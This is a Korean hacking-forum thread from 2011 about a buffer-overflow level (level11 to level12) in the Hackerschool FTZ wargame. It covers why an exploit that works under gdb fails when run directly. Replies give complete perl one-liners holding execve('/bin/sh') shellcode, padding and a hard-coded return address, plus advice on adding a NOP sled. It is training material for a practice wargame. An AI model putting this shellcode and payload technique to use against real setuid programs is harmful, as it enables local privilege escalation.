레벨 해킹

 2839, 1/142 회원가입  로그인  
   ozdang
   level11.hwp (133.0 KB), Download : 37     [오른쪽 버튼 눌러 다운 받기]
   level11->level12 에서 막힙니다. 하루종일 이거만 보네요.....

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=3217 [복사]


bof로 푸는데 좀 도와주세요..

스샷 포함해서 설명까지 적어서 파일 첨부했습니다...

내용은 gdb에서는 eip가 쉘코드까지 넘어가는데,

직접 ./attackme 공격코드 를 해보면 잘못된 명령어라고 나옵니다.

뭐가 잘못된건지좀 봐주세요...

도저히 모르겠습니다. --;

gdb와 달리 파일을 직접 실행할때 스택 잡히는게 다른건지...

ps 에그쉘 사용하지 않고 풀려고합니다..

  Hit : 3032     Date : 2011/07/01 01:21



    
W.H. 잘못된 명령어라 나오는걸 보니까... 쉘코드에 이상이 잇는것 같네요

보통 공격이 통하지 않으면 세그먼트 폴트나 컨텍스트 에런가?

하여간 변조된 sfp 값때문에 문법에러나 변조된 ret 에러땜시 세그먼프 폴트가 뜹니다

잘못된 명령어라 뜨는 경우는 처음 봤는데 아마 쉘코드를 제대로 가리키고 있지 못하거나 쉘코드가 잘못된것 같네요

쉘코드 앞에 \x90(NOP) 좀 넣어서 다시 해보세요
2011/07/01  
W.H. 이 공격소스 `perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80","A"x243,"\x10\xf9\xff\xbf"'`
를

`perl -e 'print "\x200","\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80","A"x43,"\x10\xf9\xff\xbf"'`

으로 바꿔서 해보세요
2011/07/01  
W.H. 아 또 댓글쓰네;;

bash2 꼭 실행하시고요 그리고 저거 실행해보니 그런 파일이 없다고 뜨는데 아무래도 쉘코드가 이상한것 같네요 한번 다른 쉘코드 구해다 써보세요
2011/07/01  
ozdang 앞에 NOP 처리를 하니까 되긴 되네요..
해커스쿨 ftz는 논랜덤스택이라고 알고 있는데
왜 gdb와 차이가 나는지 모르겠네요...--;
2011/07/02  
ozdang gdb와 실제 실행할 때 스택하고 다르게 나올 수 도 있군요 --;;;
환경변수를 이용해서 하는게 편하다는걸 알았습니다...
2011/07/02  
milkily 혹시요 버젼업 되면서 랜덤 쓰래기 값이 생겻다고 문서를 본거같은데? 제가 지금 쓴 말이 지금 질묺신내용하고 상통하고잇는건가요? 문서란 문서 다보다가. 이젠 뭐가 뭔지 해깔리는지경이네요 2011/10/12